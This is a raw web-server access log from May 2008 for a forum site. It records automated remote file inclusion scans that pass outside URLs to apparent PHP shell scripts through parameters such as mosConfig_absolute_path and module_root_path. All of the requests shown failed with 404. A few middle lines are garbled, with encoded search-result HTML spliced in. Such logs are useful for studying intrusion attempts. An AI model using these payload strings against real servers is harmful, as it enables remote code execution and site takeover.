85.214.97.225 - - [11/May/2008:17:21:28 -0700] "GET /logs/access_071203.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:21:28 -0700] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:21:28 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:21:28 -0700] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:21:29 -0700] "GET /logs/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:21:40 -0700] "GET /logs/access.log//content/multithumb/multithumb?mosConfig_absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:21:40 -0700] "GET /logs/access.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:21:41 -0700] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:21:41 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:21:42 -0700] "GET /logs/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
209.25.221.5 - - [11/May/2008:17:22:18 -0700] "GET /logs//atom.php5?page=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
209.25.221.5 - - [11/May/2008:17:22:18 -0700] "GET //atom.php5?page=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:22:37 -0700] "GET /logs/access_080331.log//pafiledb/includes/pafiledb_constants.php?module_root_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:22:37 -0700] "GET /logs/access_080331.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
200.80.42.159 - - [11/May/2008:17:23:06 -0700] "GET /logs/access.log/index.php?redir=http://www.campuswatch.net/calendar//tools/albo/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.80.42.159 - - [11/May/2008:17:23:06 -0700] "GET /logs/access.log/index.php?redir=http://vivace.biz/osyrys-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.80.42.159 - - [11/May/2008:17:23:06 -0700] "GET /logs/access.log/index.php?redir=http://www.campuswatch.net/calendar//tools/albo/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.80.42.159 - - [11/May/2008:17:23:06 -0700] "GET /index.php?redir=http://vivace.biz/osyrys-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.80.42.159 - - [11/May/2008:17:23:06 -0700] "GET /index.php?redir=http://www.campuswatch.net/calendar//tools/albo/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.80.42.159 - - [11/May/2008:17:23:06 -0700] "GET /index.php?redir=http://www.campuswatch.net/calendar//tools/albo/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.80.42.159 - - [11/May/2008:17:23:07 -0700] "GET /logs/index.php?redir=http://vivace.biz/osyrys-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.80.42.159 - - [11/May/2008:17:23:07 -0700] "GET /logs/index.php?redir=http://www.campuswatch.net/calendar//tools/albo/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.80.42.159 - - [11/May/2008:17:23:07 -0700] "GET /logs/index.php?redir=http://www.campuswatch.net/calendar//tools/albo/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.80.42.159 - - [11/May/2008:17:23:56 -0700] "GET /logs/access_080204.log/index.php?redir=http://www.campuswatch.net/calendar//tools/albo/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.80.42.159 - - [11/May/2008:17:23:56 -0700] "GET /logs/access_080204.log/index.php?redir=http://www.campuswatch.net/calendar//tools/albo/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.80.42.159 - - [11/May/2008:17:23:56 -0700] "GET /logs/access_080204.log/index.php?redir=http://vivace.biz/osyrys-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.155.232.37 - - [11/May/2008:17:23:57 -0700] "GET /logs/access_080324.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
195.155.232.37 - - [11/May/2008:17:23:58 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
195.155.232.37 - - [11/May/2008:17:23:58 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:24:16 -0700] "GET /logs/access_080303.log//pafiledb/includes/pafiledb_constants.php?module_root_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:24:16 -0700] "GET /logs/access_080303.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:24:24 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:24:24 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
86.109.96.33 - - [11/May/2008:17:24:48 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
86.109.96.33 - - [11/May/2008:17:24:55 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
195.155.232.37 - - [11/May/2008:17:25:52 -0700] "GET /logs/access_080324.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
195.155.232.37 - - [11/May/2008:17:25:52 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
195.155.232.37 - - [11/May/2008:17:25:53 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
209.25.221.5 - - [11/May/2008:17:26:06 -0700] "GET /logs//ashnews.php?pathtoashnews=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
209.25.221.5 - - [11/May/2008:17:26:06 -0700] "GET //ashnews.php?pathtoashnews=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
72.233.79.202 - - [11/May/2008:17:27:29 -0700] "GET /logs/errors.php?error=http://nodaorlz.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.collegiateforum.org"
72.233.79.202 - - [11/May/2008:17:27:29 -0700] "GET /errors.php?error=http://nodaorlz.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.collegiateforum.org"
61.19.30.146 - - [11/May/2008:17:27:33 -0700] "GET /logs/access_080107.log/mambots/content/configuration.php??mosConfig_absolute_path=http://www.gifr.fr/ultrastats/lang/bg/kontol?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
61.19.30.146 - - [11/May/2008:17:27:36 -0700] "GET /mambots/content/configuration.php??mosConfig_absolute_path=http://www.gifr.fr/ultrastats/lang/bg/kontol?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
61.19.30.146 - - [11/May/2008:17:27:37 -0700] "GET /logs/mambots/content/configuration.php??mosConfig_absolute_path=http://www.gifr.fr/ultrastats/lang/bg/kontol?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
195.155.232.37 - - [11/May/2008:17:28:04 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
142.150.1.9 - - [11/May/2008:17:28:14 -0700] "GET /logs/access.log/index.php?redir=http://www.campuswatch.net/calendar//tools/albo/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
142.150.1.9 - - [11/May/2008:17:28:14 -0700] "GET /index.php?redir=http://www.campuswatch.net/calendar//tools/albo/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
142.150.1.9 - - [11/May/2008:17:28:14 -0700] "GET /logs/index.php?redir=http://www.campuswatch.net/calendar//tools/albo/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
193.251.177.175 - - [11/May/2008:17:28:15 -0700] "GET /logs/access.log/index.php?redir=http://www.campuswatch.net/calendar//tools/albo/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.251.177.175 - - [11/May/2008:17:28:15 -0700] "GET /index.php?redir=http://www.campuswatch.net/calendar//tools/albo/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.251.177.175 - - [11/May/2008:17:28:16 -0700] "GET /logs/index.php?redir=http://www.campuswatch.net/calendar//tools/albo/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
72.232.214.82 - - [11/May/2008:17:28:18 -0700] "GET /logs//appserv/errors.php?error=http://nodaorlz.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.collegiateforum.org"
72.232.214.82 - - [11/May/2008:17:28:18 -0700] "GET //appserv/errors.php?error=http://nodaorlz.100webspace.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.collegiateforum.org"
88.214.192.30 - - [11/May/2008:17:28:38 -0700] "GET /logs/access_080204.log//Neos_Chronos/header.php?base_folder=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
88.214.192.30 - - [11/May/2008:17:28:38 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
88.214.192.30 - - [11/May/2008:17:28:38 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
92.48.74.30 - - [11/May/2008:17:28:44 -0700] "GET /logs/access_080107.log/browse.php/header.php?prefix=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.155.232.37 - - [11/May/2008:17:28:45 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://lcs.cornu.lyc14.ac-caen.fr/~jean.larreur//administrator/components/com_users/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
88.214.192.30 - - [11/May/2008:17:29:08 -0700] "GET /logs/access_080324.log//Neos_Chronos/header.php?base_folder=http://www.ownar.xpg.com.br/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:29:35 -0700] "GET /logs/access_080331.log%3C/span%3E%20%20-%20%3Cem%3E524k%3C/em%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.miraturk.org/forums.php?m=posts&p=17348%22%20%3EMiraTurk.Org%20%7C%20Hack%20-%20Mira%20Forum%20-%20Butun%20Rfi%20Acqlar%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3EMiraTurk.Org%20%7C%20Hack%20-%20Sitesi%20Hacker%20Sitesi%20Siteleri%20Warez%20Sitesi%20Hack%20Programlar%20Hack%20Videolar%20Hack%20Video%20...%20includes/pafiledb_constants.php?%20...%3C/div%3E%20%3Cspan%20class=url%3Ewww.miraturk.org/forums.php?m=posts&p=17348%3C/span%3E%20%20-%20%3Cem%3E218k%3C/em%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/lists.alioth.debian.org/pipermail/secure-testing-commits/2006-November/005181.html%22%20%3E[Secure-testing-commits]%20r4976%20-%20data/CVE%3C/a%3E%3Ccarrielynneware/us9:68.585.214.97.225 - - [11/May/2008:17:29:36 -0700] "GET /logs/access_080331.log%3C/span%3E%20%20-%20%3Cem%3E524k%3C/em%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.miraturk.org/forums.php?m=posts&p=17348%22%20%3EMiraTurk.Org%20%7C%20Hack%20-%20Mira%20Forum%20-%20Butun%20Rfi%20Acqlar%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3EMiraTurk.Org%20%7C%20Hack%20-%20Sitesi%20Hacker%20Sitesi%20Siteleri%20Warez%20Sitesi%20Hack%20Programlar%20Hack%20Videolar%20Hack%20Video%20...%20includes/pafiledb_constants.php?%20...%3C/div%3E%20%3Cspan%20class=url%3Ewww.miraturk.org/forums.php?m=posts&p=17348%3C/span%3E%20%20-%20%3Cem%3E218k%3C/em%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/lists.alioth.debian.org/pipermail/secure-testing-commits/2006-November/005181.html%22%20%3E[Secure-testing-commits]%20r4976%20-%20data/CVE%3C/a%3E%3Cbrookworks/us1:74.208.7185.214.97.225 - - [11/May/2008:17:29:36 -0700] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:29:36 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.214.97.225 - - [11/May/2008:17:29:36 -0700] "GET /logs/access_080331.log%3C/span%3E%20%20-%20%3Cem%3E524k%3C/em%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.miraturk.org/forums.php?m=posts&p=17348%22%20%3EMiraTurk.Org%20%7C%20Hack%20-%20Mira%20Forum%20-%20Butun%20Rfi%20Acqlar%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3EMiraTurk.Org%20%7C%20Hack%20-%20Sitesi%20Hacker%20Sitesi%20Siteleri%20Warez%20Sitesi%20Hack%20Programlar%20Hack%20Videolar%20Hack%20Video%20...%20includes/pafiledb_constants.php?%20...%3C/div%3E%20%3Cspan%20class=url%3Ewww.miraturk.org/forums.php?m=posts&p=17348%3C/span%3E%20%20-%20%3Cem%3E218k%3C/em%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/lists.alioth.debian.org/pipermail/secure-testing-commits/2006-November/005181.html%22%20%3E[Secure-testing-commits]%20r4976%20-%20data/CVE%3C/a%3E%3Cstanzepa/us1:68.195.111.85.214.97.225 - - [11/May/2008:17:29:37 -0700] "GET /logs/access_080331.log%3C/span%3E%20%20-%20%3Cem%3E524k%3C/em%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.miraturk.org/forums.php?m=posts&p=17348%22%20%3EMiraTurk.Org%20%7C%20Hack%20-%20Mira%20Forum%20-%20Butun%20Rfi%20Acqlar%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3EMiraTurk.Org%20%7C%20Hack%20-%20Sitesi%20Hacker%20Sitesi%20Siteleri%20Warez%20Sitesi%20Hack%20Programlar%20Hack%20Videolar%20Hack%20Video%20...%20includes/pafiledb_constants.php?%20...%3C/div%3E%20%3Cspan%20class=url%3Ewww.miraturk.org/forums.php?m=posts&p=17348%3C/span%3E%20%20-%20%3Cem%3E218k%3C/em%3E%20%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/lists.alioth.debian.org/pipermail/secure-testing-commits/2006-November/005181.html%22%20%3E[Secure-testing-commits]%20r4976%20-%20data/CVE%3C/a%3E%3Clichfieldblues/us4:65.21142.150.1.9 - - [11/May/2008:17:30:04 -0700] "GET /logs/access_080204.log/index.php?redir=http://www.campuswatch.net/calendar//tools/albo/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
64.22.89.194 - - [11/May/2008:17:31:24 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
64.22.89.194 - - [11/May/2008:17:31:24 -0700] "GET //skin/zero_vote/error.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
64.22.89.194 - - [11/May/2008:17:31:24 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
64.22.89.194 - - [11/May/2008:17:33:33 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.collegiateforum.org"
74.53.137.18 - - [11/May/2008:17:37:37 -0700] "GET //skin/zero_vote/error.php?dir=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:37:53 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:37:53 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:37:53 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
91.121.3.126 - - [11/May/2008:17:38:20 -0700] "GET /logs/access_080331.log//ashnews.php?pathtoashnews=http://www.filmbox.ru/d.pl? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
91.121.3.126 - - [11/May/2008:17:38:20 -0700] "GET //ashnews.php?pathtoashnews=http://www.filmbox.ru/d.pl? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
91.121.3.126 - - [11/May/2008:17:38:20 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.filmbox.ru/d.pl? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:38:24 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:38:25 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:38:25 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:38:50 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:38:50 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
88.84.144.62 - - [11/May/2008:17:38:51 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/jusuf1/pr1nc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
85.17.199.39 - - [11/May/2008:17:39:28 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.17.199.39 - - [11/May/2008:17:39:29 -0700] "GET /logs/access.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.17.199.39 - - [11/May/2008:17:39:29 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.17.199.39 - - [11/May/2008:17:39:29 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.17.199.39 - - [11/May/2008:17:39:29 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.17.199.39 - - [11/May/2008:17:39:30 -0700] "GET /logs/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:41:31 -0700] "GET /logs/access_080310.log//oneadmin/photogallery/include.php?path[docroot]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:41:31 -0700] "GET /logs/access_080310.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
62.116.117.149 - - [11/May/2008:17:41:31 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
